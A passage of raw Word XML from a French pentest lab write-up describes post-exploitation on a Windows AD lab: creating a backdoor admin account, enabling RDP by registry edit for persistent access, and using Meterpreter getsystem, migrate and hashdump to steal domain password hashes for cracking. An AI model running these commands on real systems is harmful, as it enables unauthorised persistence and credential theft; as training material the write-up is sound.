      <w:r/>
      <w:bookmarkEnd w:id="34"/>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Une fois connecter depuis meterpreter, lancer le shell :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="cente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4847381" cy="1147445"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2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1"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4852104" cy="11485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81.7pt;height:90.3pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId41" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="cente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Utilisé la commande Net users afin de vérifier les utilisateurs présents sur l’AD :</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net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> users</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Ajouter un utilisateurs hack avec un mot de passe(Bru73f0rc3) en utilisant la commande :</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net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user /add hack Bru73f0rc3</w:t>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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5759450" cy="1480185"/>
                <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                <wp:docPr id="2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2"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="14801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53.5pt;height:116.5pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId42" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>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Nous ajoutons ensuite l’utilisateur hack au groupe des administrateurs afin que le compte puisse effectuer des fonctions d'administration. La commande utilisée est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net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> localgroup administrateurs hack /add</w:t>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Il existe ensuite 2 méthodes une pour W10 et une autre pour un contrôleur de domaine :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="180"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="35" w:name="_Toc121842995"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Méthode W10</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>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Nous l'ajoutons ensuite au groupe RDP. Cela nous permettra de nous connecter via RDP à la machine cible, même après qu'elle ait été corrigée pour activer le pare-feu et l'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">antiviru</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> localgroup “Remote Desktop Users” hack /add</w:t>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net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> localgroup "Utilisateurs du Bureau à distance" hack /add</w:t>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Si vous souhaitez désactiver RDP à quelque fin que ce soit, vous pouvez le faire en tapant la commande suivante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reg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="180"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="36" w:name="_Toc121842996"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Méthode AD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>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t xml:space="preserve">Pour activer RDP, utilisez la commande suivante afin d’ajouter une clé de registre</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>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reg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</w:t>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Enfin sur la Kali Linux nous pouvons utiliser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">remmina</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> afin de se connecter en RDP au server ou au client W10. Pour installer remmina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apt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-get install remmina</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Afin de lancer remmina, tapez simplement remmina dans le prompt :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="57"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>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remmina</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Enfin connecter vous au server avec l’utilisateur « hack » que vous avez créé précédemment :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entrer l’adresse IP de votre WS2016</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4616533" cy="1557196"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:docPr id="2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3"/>
                        <a:srcRect l="0" t="0" r="0" b="49747"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4689608" cy="158184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63.5pt;height:122.6pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="f">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId43" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accepter</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4612906" cy="1593410"/>
                <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                <wp:docPr id="2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4"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4688367" cy="16194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63.2pt;height:125.5pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId44" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entrer les informations suivantes :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2950806" cy="1619589"/>
                <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                <wp:docPr id="2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5"/>
                        <a:srcRect l="6949" t="5140" r="8069" b="5796"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3000357" cy="1646786"/>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32.3pt;height:127.5pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="f">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId45" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2564060" cy="1554832"/>
                <wp:effectExtent l="0" t="0" r="8255" b="7620"/>
                <wp:docPr id="3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6"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2571468" cy="15593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01.9pt;height:122.4pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId46" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1040"/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="37" w:name="_Toc121842997"/>
      <w:r/>
      <w:bookmarkStart w:id="38" w:name="_Toc123116341"/>
      <w:r>
        <w:t xml:space="preserve">HASDUMP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:r/>
      <w:bookmarkEnd w:id="38"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Nous allons récupérer les mdp des comptes à l’aide de hashdump.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Afin d’utiliser hashdump, il va falloir utiliser les commandes {ps ; getprivs ; getsystem ; hasdump ; migrate et l’extensions kiwi}.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PS va nous servir à afficher la liste des processus en cours d’exécution sur la machine :</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ps</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Mais celui qui nous intéresse est le processus 2616, qui correspond au dns :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5759450" cy="763905"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3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7"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="7639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53.5pt;height:60.1pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId47" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Getprivs nous indique les privilèges :</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getprivs</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="1852837" cy="3256224"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:docPr id="3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8"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1854597" cy="32593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145.9pt;height:256.4pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId48" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enfin getsystem nous servira à passer en temps qu’utilisateur système.</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getsystem</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5759450" cy="321945"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:docPr id="3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9"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="3219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453.5pt;height:25.3pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId49" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Afin de ne pas rencontrer d’erreur, il faudra migrer sur un procès x64 si votre computeur s’exécute en x64 avec la commande migrate. Le PID est important à cette étape « voir commande PS » :</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migrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2616</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4448175" cy="733425"/>
                <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                <wp:docPr id="3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stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4448175" cy="733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50.2pt;height:57.8pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId50" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Une fois le PID migré, vous pouvez utilisé hashdump :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>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
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:color w:val="ffffff" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hashdump</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Nous pouvons ainsi retrouver les mots de passe hacher de tous les utilisateurs de l’active directory, et les crackers via des logiciels tell que Hashcat ou encore John :</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5759450" cy="1097280"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:docPr id="3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1"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5759450" cy="10972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53.5pt;height:86.4pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="false">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId51" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="991"/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:r/>
      <w:r/>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId10"/>
      <w:footerReference w:type="default" r:id="rId12"/>
      <w:footnotePr/>
      <w:endnotePr/>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
